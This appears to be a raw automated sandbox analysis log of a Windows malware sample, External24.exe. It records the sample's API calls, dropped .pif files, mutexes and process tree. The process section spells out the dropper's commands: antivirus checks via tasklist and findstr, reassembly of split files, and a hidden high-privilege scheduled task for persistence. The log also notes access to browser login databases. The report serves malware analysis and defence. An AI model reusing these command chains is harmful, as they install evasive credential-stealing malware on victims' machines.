Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js"

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_006640C1: CreateFileW,DeviceIoControl,CloseHandle,

15_2_006640C1

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00658D11 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

15_2_00658D11

Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,	0_2_004038AF
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006655E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	15_2_006655E5
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C55E5 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,	21_2_006C55E5

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\SysWOW64\GroupPolicy\gpt.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\Machine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\User	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Windows\System32\GroupPolicy\GPT.INI	Jump to behavior

Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\External24.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0060B020	15_2_0060B020
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006094E0	15_2_006094E0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00609C80	15_2_00609C80
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006881C8	15_2_006881C8
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00622325	15_2_00622325
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00636432	15_2_00636432
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0063258E	15_2_0063258E
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0060E6F0	15_2_0060E6F0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062275A	15_2_0062275A
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00680802	15_2_00680802
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006388EF	15_2_006388EF
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006369A4	15_2_006369A4
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00610BE0	15_2_00610BE0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0065EB95	15_2_0065EB95
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00680C7F	15_2_00680C7F
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00668CB1	15_2_00668CB1
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062CC81	15_2_0062CC81
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00636F16	15_2_00636F16
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006232E9	15_2_006232E9
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062F339	15_2_0062F339
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0061D457	15_2_0061D457
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0061F57E	15_2_0061F57E
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006215E4	15_2_006215E4
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00601663	15_2_00601663
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0060F6A0	15_2_0060F6A0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_006277F3	15_2_006277F3
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062DAD5	15_2_0062DAD5
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00621AD8	15_2_00621AD8
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00639C15	15_2_00639C15
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0061DD14	15_2_0061DD14
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00621EF0	15_2_00621EF0
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0062BF06	15_2_0062BF06
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E81C8	21_2_006E81C8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00682325	21_2_00682325
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00696432	21_2_00696432
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0069258E	21_2_0069258E
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0066E6F0	21_2_0066E6F0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068275A	21_2_0068275A
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E0802	21_2_006E0802
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006988EF	21_2_006988EF
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006969A4	21_2_006969A4
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00670BE0	21_2_00670BE0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006BEB95	21_2_006BEB95
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E0C7F	21_2_006E0C7F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C8CB1	21_2_006C8CB1
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068CC81	21_2_0068CC81
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00696F16	21_2_00696F16
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0066B020	21_2_0066B020
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006832E9	21_2_006832E9
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068F339	21_2_0068F339
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067D457	21_2_0067D457
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006694E0	21_2_006694E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067F57E	21_2_0067F57E
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006815E4	21_2_006815E4
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00661663	21_2_00661663
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0066F6A0	21_2_0066F6A0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006877F3	21_2_006877F3
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00681AD8	21_2_00681AD8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068DAD5	21_2_0068DAD5
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00699C15	21_2_00699C15
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00669C80	21_2_00669C80
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067DD14	21_2_0067DD14
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00681EF0	21_2_00681EF0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068BF06	21_2_0068BF06
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C100A0	21_2_00C100A0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B9002D	21_2_00B9002D
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C5A2B0	21_2_00C5A2B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B5A2C0	21_2_00B5A2C0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BFA200	21_2_00BFA200
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BF6250	21_2_00BF6250
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C0E3C0	21_2_00C0E3C0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE63B0	21_2_00BE63B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C084D0	21_2_00C084D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C4A480	21_2_00C4A480
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C2E430	21_2_00C2E430
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C64550	21_2_00C64550
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE86B0	21_2_00BE86B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C306D0	21_2_00C306D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE0600	21_2_00BE0600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BF88B0	21_2_00BF88B0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C4A930	21_2_00C4A930
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C34BD0	21_2_00C34BD0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C4AD00	21_2_00C4AD00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BEAF60	21_2_00BEAF60
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BEF0D0	21_2_00BEF0D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C2F030	21_2_00C2F030
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BED3A0	21_2_00BED3A0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C8F550	21_2_00C8F550
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C03600	21_2_00C03600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C27600	21_2_00C27600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C01630	21_2_00C01630
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE5790	21_2_00BE5790
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B5B8E0	21_2_00B5B8E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BFDB20	21_2_00BFDB20
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B59C90	21_2_00B59C90
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BD1C10	21_2_00BD1C10
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C47D00	21_2_00C47D00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C11F20	21_2_00C11F20
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE3F40	21_2_00BE3F40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C720D0	21_2_00C720D0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C460E0	21_2_00C460E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BD611D	21_2_00BD611D
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C3E170	21_2_00C3E170
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BF4320	21_2_00BF4320
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B9036F	21_2_00B9036F
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C40450	21_2_00C40450
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C485F0	21_2_00C485F0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BD45E0	21_2_00BD45E0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA47BF	21_2_00BA47BF
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C42820	21_2_00C42820
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B8A928	21_2_00B8A928
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C96970	21_2_00C96970
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00B8C960	21_2_00B8C960
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA8BB0	21_2_00BA8BB0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C48B40	21_2_00C48B40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C3EC40	21_2_00C3EC40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C84D40	21_2_00C84D40
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C96D20	21_2_00C96D20
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C56EA0	21_2_00C56EA0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C66EA0	21_2_00C66EA0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: String function: 00628A60 appears 42 times
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: String function: 00611A36 appears 34 times
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: String function: 00620C42 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00C97510 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00671A36 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00680C42 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00B6ACE0 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00B84380 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: String function: 00688A60 appears 42 times
Source: C:\Users\user\Desktop\External24.exe	Code function: String function: 004062CF appears 57 times

Source: External24.exe

Static PE information: invalid certificate

Source: External24.exe, 00000000.00000002.1711124595.00000000005FC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameCmd.Exej% vs External24.exe

Source: External24.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@30/75@3/3

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_0066A51A GetLastError,FormatMessageW,

15_2_0066A51A

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00658BCC AdjustTokenPrivileges,CloseHandle,	15_2_00658BCC
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0065917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	15_2_0065917C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006B8BCC AdjustTokenPrivileges,CloseHandle,	21_2_006B8BCC
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006B917C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	21_2_006B917C

Source: C:\Users\user\Desktop\External24.exe

0_2_004044D1

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00620D68 FindCloseChangeNotification,CreateToolhelp32Snapshot,

15_2_00620D68

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_006642AA __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

15_2_006642AA

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

File created: C:\Users\user\AppData\Local\PixelFlow Creations

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Mutant created: \Sessions\1\BaseNamedObjects\slickSlideAnd2663
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03

Source: C:\Users\user\Desktop\External24.exe

File created: C:\Users\user\AppData\Local\Temp\nsxDC41.tmp

Jump to behavior

Source: External24.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\External24.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\External24.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Lawyers.pif, Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: LrsRpbnZnzPmLogin Data For Account.21.dr, m5Mie8xKwOWILogin Data.21.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: External24.exe

ReversingLabs: Detection: 18%

Source: C:\Users\user\Desktop\External24.exe

File read: C:\Users\user\Desktop\External24.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\External24.exe "C:\Users\user\Desktop\External24.exe"
Source: C:\Users\user\Desktop\External24.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 292668
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "towersallowancemeaninghelp" Wine
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 292668\Lawyers.pif 292668\r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m"
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
Source: C:\Users\user\Desktop\External24.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Forgot Forgot.cmd & Forgot.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 292668	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "towersallowancemeaninghelp" Wine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Therefore + Physical + Inflation + Inspections + Sharon + Lung + Appearance + Warming + Army + Latinas + Anytime + Wiley + Zoning + Cincinnati + Accidents + Helena 292668\r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif 292668\Lawyers.pif 292668\r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "PixelFlow" /tr "wscript //B 'C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js'" /sc onlogon /F /RL HIGHEST	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process created: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif" "C:\Users\user\AppData\Local\PixelFlow Creations\m"	Jump to behavior

Source: C:\Users\user\Desktop\External24.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Section loaded: iertutil.dll	Jump to behavior
